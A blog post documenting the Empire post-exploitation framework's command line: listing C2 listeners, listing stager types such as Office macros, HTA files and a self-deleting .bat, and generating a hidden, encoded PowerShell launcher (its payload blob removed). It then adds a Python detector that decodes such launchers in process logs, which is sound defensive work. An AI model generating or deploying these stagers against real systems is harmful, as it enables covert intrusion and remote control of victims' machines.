Empire’s CLI

This post is part of the ‘Empire Series’ with some background and an ongoing list of series posts [kept here].

Recently, an Empire user requested that we build a ‘standalone payload generator’, similar to msfvenom’s functionality. The motivation is to provide a scriptable capability that makes integration with other tools relatively easy. This short post will cover the newly integrated command line options for Empire which allow for the scripted generation of stagers.

To display the currently available options, run ./empire -h

# ./empire -h
usage: empire [-h] [--debug [DEBUG]] [-s [STAGER]]
              [-o [STAGER_OPTIONS [STAGER_OPTIONS ...]]] [-l [LISTENER]] [-v]

optional arguments:
  -h, --help            show this help message and exit
  --debug [DEBUG]       Debug level for output (default of 1).
  -s [STAGER], --stager [STAGER]
                        Specify a stager to generate. Lists all stagers if
                        none is specified.
  -o [STAGER_OPTIONS [STAGER_OPTIONS ...]], --stager-options [STAGER_OPTIONS [STAGER_OPTIONS ...]]
                        Supply options to set for a stager in OPTION=VALUE
                        format. Lists options if nothing is specified.
  -l [LISTENER], --listener [LISTENER]
                        Display listener options. Displays all listeners if
                        nothing is specified.
  -v, --version         Display current Empire version.

To use Empire's CLI effectively, you need a listener already set up, because the CLI reads listener data from the backend empire.db database. A running ./empire instance is not required to generate stagers (though one can be running at the same time), but the command does need to be executed from the same path as the Empire installation containing the configured listeners.

In order to display the active listeners, use ./empire -l

# ./empire -l

[*] Active listeners:

  ID    Name              Host                                 Type      Delay/Jitter   KillDate    Redirect Target
  --    ----              ----                                 -------   ------------   --------    ---------------
  1     test              http://192.168.52.142:8080           native    5/0.0                      

To display the configuration for a particular listener, use ./empire -l <listener_name>

# ./empire -l test

Listener Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        test                             Listener name.
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  StagingKey        True        2c103f2c4ed1e59c0b4e2e01821770fa Staging key for initial agent negotiation.
  Type              True        native                           Listener type (native, pivot, hop).
  ID                True        1                                Listener ID.
  RedirectTarget    False                                        Listener target to redirect to for pivot/hop.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  Host              True        http://192.168.52.139:8080       Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  DefaultProfile    True        /admin/get.php,/news.asp,/login/ Default communication profile for the agent.
                                process.jsp|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Port              True        8080                             Port for the listener.

If you want to display the available Empire stagers, use ./empire -s

# ./empire -s

Stagers:

  Name             Description
  ----             -----------
  ducky            Generates a ducky script that runes a one-liner stage0 launcher for Empire.
  hta              Generates an HTA (HyperText Application) For Internet Explorer
  launcher         Generates a one-liner stage0 launcher for Empire.
  macro            Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types.
  launcher_bat     Generates a self-deleting .bat launcher for Empire.
  dll              Generate a PowerPick Reflective DLL to inject with stager code.
  launcher_vbs     Generates a .vbs launcher for Empire.
  stager           Generates a (stage1) key-negotiation stager for Empire.
  pth_wmis         Generates a pth-wmis launcher for Empire.
  war              Generates a Deployable War file.
  hop_php          Generates a hop.php redirector for an Empire listener.

To see the configurable options for a given stager, use ./empire -s <stager_name>

# ./empire -s launcher

Name: Launcher

Description:
  Generates a one-liner stage0 launcher for Empire.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  Base64           True        True              Switch. Base64 encode the output.
  Listener         True                          Listener to generate stager for.
  OutFile          False                         File to output launcher to, otherwise
                                                 displayed on the screen.
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).

And finally, to generate a given stager, supply its options in the -o OPTION1=VALUE1 OPTION2=VALUE2 format. Be sure to set every option marked Required in the configuration display above.

# ./empire -s launcher -o Listener=test
powershell.exe -NoP -NonI -W Hidden -Enc <base64 blob removed>
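The launcher printed above has a recognisable shape on the defending side: a PowerShell process started with abbreviated switches (-NoP, -NonI, -W Hidden) and an -Enc payload, which is base64 over UTF-16LE text rather than UTF-8. The following is an added example written for this post, not code from Empire or from the original article, showing how a detection script can normalise PowerShell's prefix-abbreviated parameters, decode the encoded command, and flag only the combination that matches this launcher while letting an ordinary -EncodedCommand admin script through. The log format (a `cmd=` field on each process-creation record) and the encoded payload are constructed for the example.

```python
"""Flag PowerShell launchers shaped like Empire's `launcher` stager output:
powershell.exe -NoP -NonI -W Hidden -Enc <base64>

PowerShell accepts any unambiguous prefix of a parameter name, so the
detector canonicalises abbreviations before matching, and -EncodedCommand
carries base64 over UTF-16LE text.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Canonical parameter names plus the short aliases PowerShell documents.
PARAMETERS = {
    "noprofile": {"nop"},
    "noninteractive": {"noni"},
    "windowstyle": {"w"},
    "encodedcommand": {"e", "ec", "enc"},
    "executionpolicy": {"ep", "ex", "exec"},
}
# Switches that consume the following token as their value.
VALUE_SWITCHES = {"windowstyle", "encodedcommand", "executionpolicy"}

POWERSHELL_RE = re.compile(
    r"(?:^|[\\\s\"'])(?:powershell|pwsh)(?:\.exe)?(?=\s|$)", re.IGNORECASE)
CMD_FIELD_RE = re.compile(r"\bcmd=(.*)$")


def canonical_switch(token: str) -> Optional[str]:
    """Map a token such as '-NoP' to its canonical parameter name, or None."""
    if not token or token[0] not in "-/":
        return None
    stem = token[1:].lower()
    for name, aliases in PARAMETERS.items():
        if stem in aliases:
            return name
    matches = [name for name in PARAMETERS if name.startswith(stem)]
    return matches[0] if len(matches) == 1 else None  # ambiguous prefix -> None


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode an -EncodedCommand argument; None if not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are ValueErrors
        return None


@dataclass
class Finding:
    command_line: str
    switches: set = field(default_factory=set)
    hidden_window: bool = False
    decoded_command: Optional[str] = None

    @property
    def suspicious(self) -> bool:
        # An encoded command alone is common in legitimate automation; paired
        # with a hidden window, or with both -NoProfile and -NonInteractive,
        # it matches the launcher shape.
        if "encodedcommand" not in self.switches:
            return False
        quiet = {"noprofile", "noninteractive"} <= self.switches
        return self.hidden_window or quiet


def analyse_command_line(cmdline: str) -> Optional[Finding]:
    """Return a Finding for a PowerShell command line, None for anything else."""
    if not POWERSHELL_RE.search(cmdline):
        return None
    tokens = cmdline.split()
    finding = Finding(command_line=cmdline)
    i = 0
    while i < len(tokens):
        name = canonical_switch(tokens[i])
        i += 1
        if name is None:
            continue
        finding.switches.add(name)
        if name in VALUE_SWITCHES:
            value = tokens[i] if i < len(tokens) else ""
            i += 1  # the value is consumed, so a base64 blob starting with '/' is not a switch
            if name == "windowstyle" and value.lower() == "hidden":
                finding.hidden_window = True
            elif name == "encodedcommand":
                finding.decoded_command = decode_encoded_command(value)
    return finding


def scan_log_lines(lines: List[str]) -> List[Finding]:
    """Return suspicious findings from records carrying a cmd= field."""
    hits = []
    for line in lines:
        m = CMD_FIELD_RE.search(line)
        if not m:
            continue
        finding = analyse_command_line(m.group(1))
        if finding and finding.suspicious:
            hits.append(finding)
    return hits


# Constructed sample records (not real telemetry). The payload is a harmless
# constructed command encoded the way PowerShell expects (UTF-16LE, base64).
SAMPLE_PAYLOAD = "Write-Output 'constructed sample'"
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")
CONSTRUCTED_LOG_LINES = [
    "event=4688 parent=explorer.exe cmd=notepad.exe C:\\notes.txt",
    "event=4688 parent=cmd.exe cmd=powershell.exe -NoProfile -Command Get-Date",
    "event=4688 parent=svchost.exe cmd=powershell.exe -EncodedCommand " + SAMPLE_B64,
    "event=4688 parent=winword.exe cmd=powershell.exe -NoP -NonI -W Hidden -Enc " + SAMPLE_B64,
]

if __name__ == "__main__":
    for hit in scan_log_lines(CONSTRUCTED_LOG_LINES):
        print("suspicious:", hit.command_line)
        print("  decoded :", hit.decoded_command)
```

Only the last constructed record is reported: the plain -EncodedCommand line decodes fine but lacks the hidden-window and quiet-profile switches, which is the distinction a practitioner tunes rather than alerting on every encoded command.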

Have fun!
